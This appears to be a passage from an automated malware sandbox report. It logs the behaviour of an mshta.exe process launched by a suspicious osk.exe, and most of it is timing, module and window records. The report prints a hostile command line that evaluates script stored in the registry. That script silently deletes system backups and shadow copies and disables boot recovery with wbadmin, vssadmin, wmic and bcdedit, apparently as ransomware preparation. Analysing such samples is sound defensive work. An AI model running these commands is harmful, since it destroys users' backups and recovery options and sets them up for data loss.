Get Time	type = Performance Ctr, time = 25610914310	1	Fn
Get Time	type = Performance Ctr, time = 25614054547	1	Fn
Get Time	type = Performance Ctr, time = 25614065885	1	Fn
Get Time	type = Performance Ctr, time = 25615833460	1	Fn
Get Time	type = Performance Ctr, time = 25615851726	1	Fn
Get Time	type = Performance Ctr, time = 25618773073	1	Fn
Get Time	type = Performance Ctr, time = 25618787805	1	Fn
Get Time	type = Performance Ctr, time = 25620291031	1	Fn
Get Time	type = Performance Ctr, time = 25620303953	1	Fn
Get Time	type = Performance Ctr, time = 25623436446	1	Fn
Get Time	type = Performance Ctr, time = 25623448830	1	Fn
Get Time	type = Performance Ctr, time = 25626539051	1	Fn
Get Time	type = Performance Ctr, time = 25626552250	1	Fn
Get Time	type = Performance Ctr, time = 25629681913	1	Fn
Get Time	type = Performance Ctr, time = 25629693357	1	Fn
Get Time	type = Performance Ctr, time = 25633854115	1	Fn
Get Time	type = Performance Ctr, time = 25633870597	1	Fn
Get Time	type = Performance Ctr, time = 25635955450	1	Fn
Get Time	type = Performance Ctr, time = 25635970522	1	Fn
Get Time	type = Performance Ctr, time = 25639051360	1	Fn
Get Time	type = Performance Ctr, time = 25639067674	1	Fn
Get Time	type = Performance Ctr, time = 25642183712	1	Fn
Get Time	type = Performance Ctr, time = 25642195918	1	Fn
Get Time	type = Performance Ctr, time = 25643728053	1	Fn
Get Time	type = Performance Ctr, time = 25643743436	1	Fn
Get Time	type = Performance Ctr, time = 25646911621	1	Fn
Get Time	type = Performance Ctr, time = 25646922803	1	Fn
Get Time	type = Performance Ctr, time = 25649962523	1	Fn
Get Time	type = Performance Ctr, time = 25649974439	1	Fn
Get Time	type = Performance Ctr, time = 25651574965	1	Fn
Get Time	type = Performance Ctr, time = 25651586200	1	Fn
Get Time	type = Performance Ctr, time = 25655566538	1	Fn
Get Time	type = Performance Ctr, time = 25655578911	1	Fn
Get Time	type = Performance Ctr, time = 25656251150	1	Fn
Get Time	type = Performance Ctr, time = 25656265153	1	Fn
Get Time	type = Performance Ctr, time = 25659333879	1	Fn
Get Time	type = Performance Ctr, time = 25659348697	1	Fn
Get Time	type = Performance Ctr, time = 25660947500	1	Fn
Get Time	type = Performance Ctr, time = 25660962437	1	Fn
Get Time	type = Performance Ctr, time = 25664051571	1	Fn
Get Time	type = Performance Ctr, time = 25664193816	1	Fn
Get Time	type = Performance Ctr, time = 25665636610	1	Fn
Get Time	type = Performance Ctr, time = 25665651665	1	Fn
Get Time	type = Performance Ctr, time = 25668725227	1	Fn
Get Time	type = Performance Ctr, time = 25668741332	1	Fn
Get Time	type = Performance Ctr, time = 25693237888	1	Fn
Get Time	type = Performance Ctr, time = 25693252792	1	Fn
Get Time	type = Performance Ctr, time = 25693739200	1	Fn
Get Time	type = Performance Ctr, time = 25693821254	1	Fn
Get Time	type = Performance Ctr, time = 25695280443	1	Fn
Get Time	type = Performance Ctr, time = 25695292467	1	Fn
Get Time	type = Performance Ctr, time = 25696875315	1	Fn
Get Time	type = Performance Ctr, time = 25696888000	1	Fn
Get Time	type = Performance Ctr, time = 25701123387	1	Fn
Get Time	type = Performance Ctr, time = 25701139314	1	Fn
Get Time	type = Performance Ctr, time = 25703182034	1	Fn
Get Time	type = Performance Ctr, time = 25703196254	1	Fn
Get Time	type = Performance Ctr, time = 25706569942	1	Fn
Get Time	type = Performance Ctr, time = 25706582500	1	Fn
Get Time	type = Performance Ctr, time = 25709393366	1	Fn
Get Time	type = Performance Ctr, time = 25709405329	1	Fn
Get Time	type = Performance Ctr, time = 25717253453	1	Fn
Get Time	type = Performance Ctr, time = 25717266847	1	Fn
Get Time	type = Performance Ctr, time = 25717344933	1	Fn
Get Time	type = Performance Ctr, time = 25717356779	1	Fn
Get Time	type = Performance Ctr, time = 25717379525	1	Fn
Get Time	type = Performance Ctr, time = 25718722122	1	Fn
Get Time	type = Performance Ctr, time = 25718736091	1	Fn
Get Time	type = Performance Ctr, time = 25720375683	1	Fn
Get Time	type = Performance Ctr, time = 25720392250	1	Fn
Get Time	type = Performance Ctr, time = 25723420998	1	Fn
Get Time	type = Performance Ctr, time = 25723437646	1	Fn
Get Time	type = Performance Ctr, time = 25727335941	1	Fn
Get Time	type = Performance Ctr, time = 25727347869	1	Fn
Get Time	type = Performance Ctr, time = 25729670292	1	Fn
Get Time	type = Performance Ctr, time = 25729682142	1	Fn
Get Time	type = Performance Ctr, time = 25729868046	1	Fn
Get Time	type = Performance Ctr, time = 25729880049	1	Fn
Get Time	type = Performance Ctr, time = 25729895337	1	Fn
Get Time	type = Performance Ctr, time = 25729905567	1	Fn
Get Time	type = Performance Ctr, time = 25729917993	1	Fn
Get Time	type = Performance Ctr, time = 25729927738	1	Fn
Get Time	type = Performance Ctr, time = 25729932508	1	Fn
Get Time	type = Ticks, time = 257265	2	Fn
Get Time	type = Performance Ctr, time = 25731774506	1	Fn
Get Time	type = Performance Ctr, time = 25731795848	1	Fn
Get Time	type = Performance Ctr, time = 25734356345	1	Fn
Get Time	type = Performance Ctr, time = 25734376365	1	Fn
Get Time	type = Performance Ctr, time = 25734995799	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:31 (UTC)	26	Fn
Get Time	type = Ticks, time = 257312	2	Fn
Get Time	type = Performance Ctr, time = 25735936528	1	Fn
Get Time	type = Performance Ctr, time = 25735947963	1	Fn
Get Time	type = Ticks, time = 257328	3	Fn
Get Time	type = Performance Ctr, time = 25739034347	1	Fn
Get Time	type = Performance Ctr, time = 25739048418	1	Fn
Get Time	type = Performance Ctr, time = 25740631052	1	Fn
Get Time	type = Performance Ctr, time = 25740643438	1	Fn
Get Time	type = Performance Ctr, time = 25742157737	1	Fn
Get Time	type = Performance Ctr, time = 25742171182	1	Fn
Get Time	type = Performance Ctr, time = 25769453109	1	Fn
Get Time	type = Performance Ctr, time = 25769466795	1	Fn
Get Time	type = Performance Ctr, time = 25771836200	1	Fn
Get Time	type = Performance Ctr, time = 25771849837	1	Fn
Get Time	type = Performance Ctr, time = 25773449018	1	Fn
Get Time	type = Performance Ctr, time = 25773461534	1	Fn
Get Time	type = Ticks, time = 257703	3	Fn
Get Time	type = Performance Ctr, time = 25775003483	1	Fn
Get Time	type = Performance Ctr, time = 25775018723	1	Fn
Get Time	type = Performance Ctr, time = 25775024713	1	Fn
Get Time	type = Ticks, time = 257718	7	Fn
Get Time	type = Performance Ctr, time = 25776268947	1	Fn
Get Time	type = Performance Ctr, time = 25776277411	1	Fn
Get Time	type = Performance Ctr, time = 25776383325	1	Fn
Get Time	type = Performance Ctr, time = 25776529059	1	Fn
Get Time	type = Performance Ctr, time = 25776541903	1	Fn
Get Time	type = Performance Ctr, time = 25777359917	1	Fn
Get Time	type = Ticks, time = 257734	2	Fn
Get Time	type = Performance Ctr, time = 25777481411	1	Fn
Get Time	type = Performance Ctr, time = 25777517164	1	Fn
Get Time	type = Performance Ctr, time = 25778009669	1	Fn
Get Time	type = Ticks, time = 257750	1	Fn
Get Time	type = Performance Ctr, time = 25780487891	1	Fn
Get Time	type = Performance Ctr, time = 25780519225	1	Fn
Get Time	type = Performance Ctr, time = 25784643900	1	Fn
Get Time	type = Performance Ctr, time = 25784678915	1	Fn
Get Time	type = Performance Ctr, time = 25784775339	1	Fn
Get Time	type = Performance Ctr, time = 25784809567	1	Fn
Get Time	type = Performance Ctr, time = 25787473762	1	Fn
Get Time	type = Performance Ctr, time = 25787508531	1	Fn
Get Time	type = Performance Ctr, time = 25787574448	1	Fn
Get Time	type = Performance Ctr, time = 25790630621	1	Fn
Get Time	type = Performance Ctr, time = 25790664824	1	Fn
Get Time	type = Performance Ctr, time = 25792166702	1	Fn
Get Time	type = Performance Ctr, time = 25792198674	1	Fn
Get Time	type = Ticks, time = 257906	5	Fn
Get Time	type = Performance Ctr, time = 25794715316	1	Fn
Get Time	type = Performance Ctr, time = 25794735009	1	Fn
Get Time	type = Performance Ctr, time = 25794826888	1	Fn
Get Time	type = Performance Ctr, time = 25794833523	1	Fn
Get Time	type = Performance Ctr, time = 25795341438	1	Fn
Get Time	type = Performance Ctr, time = 25795372423	1	Fn
Get Time	type = Ticks, time = 257921	4	Fn
Get Time	type = Performance Ctr, time = 25795558032	1	Fn
Get Time	type = Performance Ctr, time = 25795565170	1	Fn
Get Time	type = Performance Ctr, time = 25795574801	1	Fn
Get Time	type = Performance Ctr, time = 25795581518	1	Fn
Get Time	type = Performance Ctr, time = 25796264828	1	Fn
Get Time	type = Performance Ctr, time = 25796645780	1	Fn
Get Time	type = Performance Ctr, time = 25796790880	1	Fn
Get Time	type = Performance Ctr, time = 25796839853	1	Fn
Get Time	type = Performance Ctr, time = 25796871749	1	Fn
Get Time	type = Performance Ctr, time = 25800080287	1	Fn
Get Time	type = Performance Ctr, time = 25800110682	1	Fn
Get Time	type = Performance Ctr, time = 25800139188	1	Fn
Get Time	type = Performance Ctr, time = 25803104444	1	Fn
Get Time	type = Performance Ctr, time = 25803136489	1	Fn
Get Time	type = Performance Ctr, time = 25805421943	1	Fn
Get Time	type = Performance Ctr, time = 25805455643	1	Fn
Get Time	type = Ticks, time = 258031	1	Fn
Get Time	type = Performance Ctr, time = 25807885260	1	Fn
Get Time	type = Performance Ctr, time = 25807897640	1	Fn
Get Time	type = Ticks, time = 258062	1	Fn
Get Time	type = Performance Ctr, time = 25810940683	1	Fn
Get Time	type = Performance Ctr, time = 25810953376	1	Fn
Get Time	type = Performance Ctr, time = 25814057104	1	Fn
Get Time	type = Performance Ctr, time = 25814073594	1	Fn
Get Time	type = Performance Ctr, time = 25815611766	1	Fn
Get Time	type = Performance Ctr, time = 25815628449	1	Fn
Get Time	type = Performance Ctr, time = 25818706073	1	Fn
Get Time	type = Performance Ctr, time = 25818722271	1	Fn
Get Time	type = Performance Ctr, time = 25820119826	1	Fn
Get Time	type = Performance Ctr, time = 25820169149	1	Fn
Get Time	type = Performance Ctr, time = 25822032418	1	Fn
Get Time	type = Performance Ctr, time = 25822049365	1	Fn
Get Time	type = Ticks, time = 258203	1	Fn
Get Time	type = Ticks, time = 258218	3	Fn
Get Time	type = Performance Ctr, time = 25825930248	1	Fn
Get Time	type = Performance Ctr, time = 25825955677	1	Fn
Get Time	type = Ticks, time = 258234	9	Fn
Get Time	type = Performance Ctr, time = 25826118931	1	Fn
Get Time	type = Performance Ctr, time = 25828714540	1	Fn
Get Time	type = Performance Ctr, time = 25828749978	1	Fn
Get Time	type = Ticks, time = 258265	6	Fn
Get Time	type = Performance Ctr, time = 25828887335	1	Fn
Get Time	type = Performance Ctr, time = 25828894163	1	Fn
Get Time	type = Ticks, time = 258281	2	Fn
Get Time	type = Performance Ctr, time = 25830993686	1	Fn
Get Time	type = Performance Ctr, time = 25831872696	1	Fn
Get Time	type = Ticks, time = 258296	2	Fn
Get Time	type = Ticks, time = 258312	2	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:32 (UTC)	9	Fn
Get Time	type = Ticks, time = 258328	2	Fn
Get Time	type = Ticks, time = 258343	2	Fn
Get Time	type = Ticks, time = 258359	1	Fn
Get Time	type = Ticks, time = 258781	1	Fn
Get Time	type = Performance Ctr, time = 25884893236	1	Fn
Get Time	type = Ticks, time = 258828	1	Fn
Get Time	type = Ticks, time = 258921	1	Fn
Get Time	type = Ticks, time = 259046	2	Fn
Get Time	type = Ticks, time = 259078	2	Fn
Get Time	type = Ticks, time = 260000	1	Fn
Get Time	type = Ticks, time = 260187	1	Fn
Get Time	type = Ticks, time = 260515	1	Fn
Get Time	type = Ticks, time = 260578	1	Fn
Get Time	type = Ticks, time = 260734	1	Fn
Get Time	type = Ticks, time = 260859	1	Fn
Get Time	type = Ticks, time = 261218	1	Fn
Get Time	type = Ticks, time = 261281	1	Fn
Get Time	type = Ticks, time = 261343	1	Fn
Get Time	type = Ticks, time = 261750	1	Fn
Get Time	type = Ticks, time = 261828	1	Fn
Get Time	type = Ticks, time = 261953	1	Fn
Get Time	type = Ticks, time = 262015	2	Fn
Get Time	type = Ticks, time = 262343	1	Fn
Get Time	type = Ticks, time = 262609	1	Fn
Get Time	type = Ticks, time = 262671	1	Fn
Get Time	type = Ticks, time = 262984	1	Fn
Get Time	type = Ticks, time = 263500	1	Fn
Get Time	type = Ticks, time = 263546	1	Fn
Get Time	type = Ticks, time = 263562	2	Fn
Get Time	type = Ticks, time = 263593	1	Fn
Get Time	type = Ticks, time = 264109	1	Fn
Get Time	type = Ticks, time = 264218	1	Fn
Get Time	type = Ticks, time = 264515	1	Fn
Get Time	type = Ticks, time = 264843	1	Fn
Get Time	type = Ticks, time = 265156	1	Fn
Get Time	type = Ticks, time = 265218	1	Fn
Get Time	type = Ticks, time = 265234	1	Fn
Get Time	type = Ticks, time = 265500	1	Fn
Get Time	type = Ticks, time = 265609	1	Fn
Get Time	type = Ticks, time = 265968	1	Fn
Get Time	type = Ticks, time = 266031	1	Fn
Get Time	type = Ticks, time = 266093	1	Fn
Get Time	type = Ticks, time = 266562	1	Fn
Get Time	type = Ticks, time = 266656	1	Fn
Get Time	type = Ticks, time = 266765	1	Fn
Get Time	type = Ticks, time = 266843	1	Fn
Get Time	type = Ticks, time = 267187	1	Fn
Get Time	type = Ticks, time = 267406	1	Fn
Get Time	type = Ticks, time = 267531	1	Fn
Get Time	type = Ticks, time = 267812	1	Fn
Get Time	type = Ticks, time = 268328	1	Fn
Get Time	type = Ticks, time = 268421	2	Fn
Get Time	type = Ticks, time = 268437	1	Fn
Get Time	type = Ticks, time = 268468	1	Fn
Get Time	type = Ticks, time = 269625	1	Fn
Get Time	type = Ticks, time = 269734	1	Fn
Get Time	type = Ticks, time = 269937	1	Fn
Get Time	type = Ticks, time = 270203	1	Fn
Get Time	type = Ticks, time = 270500	1	Fn
Get Time	type = Ticks, time = 270593	1	Fn
Get Time	type = Ticks, time = 270828	1	Fn
Get Time	type = Ticks, time = 271031	1	Fn
Get Time	type = Ticks, time = 272156	1	Fn
Get Time	type = Ticks, time = 272234	1	Fn
Get Time	type = Ticks, time = 272421	1	Fn
Get Time	type = Ticks, time = 273265	1	Fn
Get Time	type = Ticks, time = 273375	1	Fn
Get Time	type = Ticks, time = 273484	1	Fn
Get Time	type = Ticks, time = 273531	1	Fn
Get Time	type = Ticks, time = 273578	1	Fn
Get Time	type = Ticks, time = 273906	1	Fn
Get Time	type = Ticks, time = 279078	1	Fn
Get Time	type = Ticks, time = 279718	1	Fn
Get Time	type = Ticks, time = 280156	1	Fn
Get Time	type = Ticks, time = 280531	2	Fn
Get Time	type = Ticks, time = 280625	1	Fn
Get Time	type = Ticks, time = 281296	1	Fn
Get Time	type = Ticks, time = 281750	1	Fn
Get Time	type = Ticks, time = 282156	1	Fn
Get Time	type = Ticks, time = 282328	2	Fn
Get Time	type = Ticks, time = 282421	1	Fn
Get Time	type = Ticks, time = 282609	2	Fn
Get Time	type = Ticks, time = 283187	1	Fn
Get Time	type = Ticks, time = 283281	1	Fn
Get Time	type = Ticks, time = 283703	1	Fn
Get Time	type = Ticks, time = 283843	1	Fn
Get Time	type = Ticks, time = 284078	1	Fn
Get Time	type = Ticks, time = 284515	1	Fn
Get Time	type = Ticks, time = 284750	2	Fn
Get Time	type = Ticks, time = 285140	1	Fn
Get Time	type = Ticks, time = 285875	2	Fn
Get Time	type = Ticks, time = 286015	1	Fn
Get Time	type = Ticks, time = 286593	1	Fn
Get Time	type = Ticks, time = 286843	1	Fn
Get Time	type = Ticks, time = 287187	1	Fn
Get Time	type = Ticks, time = 287343	1	Fn
Get Time	type = Ticks, time = 287500	1	Fn
Get Time	type = Ticks, time = 287796	2	Fn
Get Time	type = Ticks, time = 288156	1	Fn
Get Info	type = Operating System	2	Fn
Get Info	type = Hardware Information	2	Fn
Get Info	type = Operating System	5	Fn
Get Info	-	1	Fn
Get Info	type = Windows Directory, result_out = C:\WINDOWS	1	Fn

Environment (3)

Operation	Additional Information	Success	Count	Logfile
Get Environment String	name = JS_DEBUG_SCOPE		2	Fn
Get Environment String	name = JS_PROFILER		1	Fn

Ini (5)

Operation	Filename	Additional Information	Count	Logfile
Read	Win.ini	section_name = windows, key_name = DragDelay, default_value = 20, data_out = 20	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollDelay, default_value = 50, data_out = 50	1	Fn
Read	Win.ini	section_name = windows, key_name = DragDelay, default_value = 200, data_out = 200	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollInterval, default_value = 50, data_out = 50	1	Fn
Read	Win.ini	section_name = windows, key_name = DragScrollInset, default_value = 11, data_out = 11	1	Fn

Debug (1)

Operation	Process	Additional Information	Success	Count	Logfile
Check for Presence	c:\windows\syswow64\mshta.exe	-		1	Fn

Process #11: mshta.exe

448

Information	Value
ID	#11
File Name	c:\windows\syswow64\mshta.exe
Command Line	mshta.exe "javascript:eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\CADHC\\SH[YU'));close();"
Initial Working Directory	C:\Users\FD1HVy\Desktop\
Monitor	Start Time: 00:04:10, Reason: Child Process
Unmonitor	End Time: 00:04:23, Reason: Self Terminated
Monitor Duration	00:00:12

OS Process Information

Information	Value
PID	0xec8
Parent PID	0x6cc (c:\users\fd1hvy\appdata\roaming\osk.exe)
Bitness	32-bit
Is Created or Modified Executable
Integrity Level	High (Elevated)
Username	NQDPDE\FD1HVy
Enabled Privileges	SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs	0x 15C 0x B08 0x 210 0x A70 0x 4F0 0x D34 0x C6C 0x 720 0x F68 0x 6C0 0x D90 0x EF8 0x F6C 0x 83C 0x ECC 0x 2B0 0x 9E0 0x EB4 0x EF4

Memory Dumps

Name	Start VA	End VA	Dump Reason	PE Rebuilds	Bitness	Entry Points	AV	YARA	Actions
jscript9.dll	0x716A0000	0x71A24FFF	Marked Writable	-	32-bit	-			... Region Actions Download Dump
mshta.exe	0x01320000	0x01327FFF	Forced	-	32-bit	-			... Region Actions Download Dump

Host Behavior

COM (6)

Operation	Class	Interface	Additional Information	Count	Logfile
Create	3050F5C8-98B5-11CF-BB82-00AA00BDCE0B	00000000-0000-0000-C000-000000000046	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	50D5107A-D278-4871-8989-F4CEAAF59CFC	08C0E040-62D1-11D1-9326-0060B067B86E	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_NO_CODE_DOWNLOAD	1	Fn
Create	16D51579-A30B-4C8B-A276-0FF4DC41E755	BB1A2AE1-A4F9-11CF-8F20-00805F2CD064	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	842A1268-6E6A-465C-868F-8BC445B9828F	8F88FD19-5D42-477B-BD45-F6A4A977ED05	cls_context = CLSCTX_INPROC_SERVER	1	Fn
Create	WScript.Shell	IClassFactory	cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER	2	Fn

File (1)

Operation	Filename	Additional Information	Success	Count	Logfile
Open Mapping	#MSHTML#PERF#00000EC8	desired_access = FILE_MAP_WRITE		1	Fn

Registry (11)

Operation	Key	Additional Information	Count	Logfile
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ChakraRecycler	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\ChakraRecycler	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Parental Controls\Users\S-1-5-21-1051304884-625712362-2192934891-1000	-	1	Fn
Open Key	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\JScriptLegacy	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\JScriptLegacy	-	1	Fn
Open Key	HKEY_CURRENT_USER\Software\CADHC	-	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE	value_name = Path, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Application Compatibility	value_name = mshta.exe, type = REG_NONE	1	Fn
Read Value	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer	value_name = NoFileMenu	1	Fn
Read Value	HKEY_CURRENT_USER\Software\CADHC	value_name = SH[YU, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_CURRENT_USER\Software\CADHC	value_name = SH[YU, data = o=new ActiveXObject("WScript.Shell");o.Run("cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0",0);o.Run("cmd.exe /c wmic SHADOWCOPY DELETE",0);o.Run("cmd.exe /c vssadmin Delete Shadows /All /Quiet",0);o.Run("cmd.exe /c bcdedit /set {default} recoveryenabled No",0);o.Run("cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures",0);, type = REG_SZ	1	Fn

Process (5)

Operation	Process	Additional Information	Count	Logfile
Create	cmd.exe	show_window = SW_HIDE	1	Fn
Create	cmd.exe	show_window = SW_HIDE	1	Fn
Create	cmd.exe	show_window = SW_HIDE	1	Fn
Create	cmd.exe	show_window = SW_HIDE	1	Fn
Create	cmd.exe	show_window = SW_HIDE	1	Fn

Module (42)

Operation	Module	Additional Information	Count	Logfile
Load	comctl32.dll	base_address = 0x72440000	1	Fn
Load	urlmon.dll	base_address = 0x74100000	1	Fn
Load	WLDP.DLL	base_address = 0x723e0000	1	Fn
Load	ext-ms-win-ntuser-touch-hittest-l1-1-0.dll	base_address = 0x74b70000	1	Fn
Load	OLEACC.DLL	base_address = 0x71fa0000	1	Fn
Load	mshtml.dll	base_address = 0x726c0000	2	Fn
Load	shell32.dll	base_address = 0x76480000	1	Fn
Get Handle	c:\windows\syswow64\kernel32.dll	base_address = 0x75e90000	3	Fn
Get Handle	c:\windows\syswow64\mshta.exe	base_address = 0x1320000	2	Fn
Get Handle	c:\windows\syswow64\user32.dll	base_address = 0x74b70000	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Handle	c:\windows\syswow64\jscript9.dll	base_address = 0x716a0000	1	Fn
Get Handle	c:\windows\syswow64\jscript9.dll	base_address = 0x716a0000	1	Fn
Get Handle	c:\windows\syswow64\kernelbase.dll	base_address = 0x74ea0000	1	Fn
Get Handle	c:\windows\syswow64\mshtml.dll	base_address = 0x726c0000, flags = GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260	2	Fn
Get Filename	c:\windows\syswow64\mshta.exe	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 260	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\Windows\System32\jscript9.dll, size = 260	1	Fn
Get Filename	-	process_name = c:\windows\syswow64\mshta.exe, file_name_orig = C:\WINDOWS\SysWOW64\mshta.exe, size = 261	2	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = HeapSetInformation, address_out = 0x75ea5850	2	Fn
Get Address	c:\windows\syswow64\user32.dll	function = SetCoalescableTimer, address_out = 0x74ba3c80	1	Fn
Get Address	c:\windows\syswow64\urlmon.dll	function = 471, address_out = 0x741845d0	1	Fn
Get Address	c:\windows\syswow64\wldp.dll	function = WldpGetLockdownPolicy, address_out = 0x723e3c20	1	Fn
Get Address	c:\windows\syswow64\user32.dll	function = RegisterTouchHitTestingWindow, address_out = 0x74ba3b50	1	Fn
Get Address	c:\windows\syswow64\oleacc.dll	function = LresultFromObject, address_out = 0x71faf590	1	Fn
Get Address	c:\windows\syswow64\kernel32.dll	function = QueryProtectedPolicy, address_out = 0x74f71cd0	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = ResolveDelayLoadedAPI, address_out = 0x74f9a730	1	Fn
Get Address	c:\windows\syswow64\kernelbase.dll	function = ResolveDelayLoadsFromDll, address_out = 0x7500d8e0	1	Fn
Get Address	c:\windows\syswow64\shell32.dll	function = ShellExecuteExW, address_out = 0x765e4730	1	Fn
Create Mapping	-	filename = System Paging File, protection = PAGE_READWRITE, SEC_COMMIT, maximum_size = 40	1	Fn
Map	-	process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ	1	Fn
Map	-	process_name = c:\windows\syswow64\mshta.exe, desired_access = FILE_MAP_WRITE, FILE_MAP_READ	1	Fn

Window (12)

Operation	Window Name	Additional Information	Count	Logfile
Create	-	class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816	1	Fn
Create	-	class_name = HTML Application Host Window Class, wndproc_parameter = 1938289816	1	Fn
Create	-	wndproc_parameter = 0	1	Fn
Create	-	wndproc_parameter = 18284544	1	Fn
Create	-	wndproc_parameter = 18146000	1	Fn
Create	-	class_name = WorkerW, wndproc_parameter = 0	1	Fn
Set Attribute	-	class_name = HTML Application Host Window Class, index = -16, new_long = -2100363264	1	Fn
Set Attribute	-	index = -21, new_long = 18284544	1	Fn
Set Attribute	-	index = -21, new_long = 18146000	1	Fn
Set Attribute	-	class_name = WorkerW, index = 0, new_long = 9756944	1	Fn
Set Attribute	-	class_name = WorkerW, index = -4, new_long = 1926608192	1	Fn
Set Attribute	-	index = -21, new_long = 0	1	Fn

Keyboard (75)

Operation	Additional Information	Count	Logfile
Get Info	type = KB_LOCALE_ID	1	Fn
Get Info	type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721	1	Fn
Get Info	type = KB_LOCALE_ID_NAME, result_out = 00000409	1	Fn
Read	virtual_key_code = VK_LBUTTON, result_out = 0	6	Fn
Read	virtual_key_code = VK_RBUTTON, result_out = 0	6	Fn
Read	virtual_key_code = VK_SHIFT, result_out = 0	12	Fn
Read	virtual_key_code = VK_CONTROL, result_out = 0	12	Fn
Read	virtual_key_code = VK_MBUTTON, result_out = 0	6	Fn
Read	virtual_key_code = VK_MENU, result_out = 0	12	Fn
Read	virtual_key_code = VK_LSHIFT, result_out = 0	6	Fn
Read	virtual_key_code = VK_LCONTROL, result_out = 0	6	Fn
Read	virtual_key_code = VK_LMENU, result_out = 0	6	Fn

System (270)

Operation	Additional Information	Count	Logfile
Get window text	window_text = 4049164	1	Fn
Get Cursor	x_out = 1000, y_out = 495	4	Fn
Get Cursor	x_out = 492, y_out = 352	2	Fn
Sleep	duration = -1 (infinite)	18	Fn
Sleep	duration = 100 milliseconds (0.100 seconds)	1	Fn
Sleep	duration = 1000 milliseconds (1.000 seconds)	1	Fn
Get Time	type = Ticks, time = 254734	2	Fn
Get Time	type = Ticks, time = 255359	1	Fn
Get Time	type = Performance Ctr, time = 25539341518	1	Fn
Get Time	type = Performance Ctr, time = 25558744524	1	Fn
Get Time	type = System Time, time = 2019-04-12 09:18:29 (UTC)	1	Fn
Get Time	type = Performance Ctr, time = 25558754851	1	Fn
Get Time	type = Performance Ctr, time = 25561899219	1	Fn
Get Time	type = Performance Ctr, time = 25561959519	1	Fn
Get Time	type = Performance Ctr, time = 25561984723	1	Fn
Get Time	type = Performance Ctr, time = 25561991140	1	Fn
Get Time	type = Performance Ctr, time = 25561997495	1	Fn
Get Time	type = Performance Ctr, time = 25562031651	1	Fn
Get Time	type = Performance Ctr, time = 25562040719	1	Fn
Get Time	type = Ticks, time = 255578	1	Fn
Get Time	type = Performance Ctr, time = 25562127682	1	Fn
Get Time	type = Performance Ctr, time = 25565211141	1	Fn
Get Time	type = Performance Ctr, time = 25565310580	1	Fn
Get Time	type = Performance Ctr, time = 25565324580	1	Fn
Get Time	type = Performance Ctr, time = 25567138837	1	Fn
Get Time	type = Performance Ctr, time = 25567163046	1	Fn
Get Time	type = Performance Ctr, time = 25568724355	1	Fn
Get Time	type = Performance Ctr, time = 25568755999	1	Fn
Get Time	type = Performance Ctr, time = 25570269496	1	Fn
Get Time	type = Performance Ctr, time = 25570294603	1	Fn
Get Time	type = Performance Ctr, time = 25572025696	1	Fn
Get Time	type = Performance Ctr, time = 25573411399	1	Fn
Get Time	type = Performance Ctr, time = 25573437729	1	Fn
Get Time	type = Performance Ctr, time = 25576514097	1	Fn
Get Time	type = Performance Ctr, time = 25576538272	1	Fn
Get Time	type = Performance Ctr, time = 25578301633	1	Fn
Get Time	type = Performance Ctr, time = 25578329132	1	Fn
Get Time	type = Performance Ctr, time = 25581402866	1	Fn
Get Time	type = Performance Ctr, time = 25581426451	1	Fn
Get Time	type = Performance Ctr, time = 25582773358	1	Fn
Get Time	type = Performance Ctr, time = 25582801191	1	Fn
Get Time	type = Performance Ctr, time = 25585947715	1	Fn
Get Time	type = Performance Ctr, time = 25585972484	1	Fn
Get Time	type = Performance Ctr, time = 25591193159	1	Fn
Get Time	type = Performance Ctr, time = 25591221017	1	Fn
Get Time	type = Performance Ctr, time = 25591322182	1	Fn
Get Time	type = Performance Ctr, time = 25591345849	1	Fn
Get Time	type = Performance Ctr, time = 25593698726	1	Fn
Get Time	type = Performance Ctr, time = 25593710594	1	Fn
Get Time	type = Performance Ctr, time = 25596900236	1	Fn
Get Time	type = Performance Ctr, time = 25596911816	1	Fn
Get Time	type = Performance Ctr, time = 25598500104	1	Fn
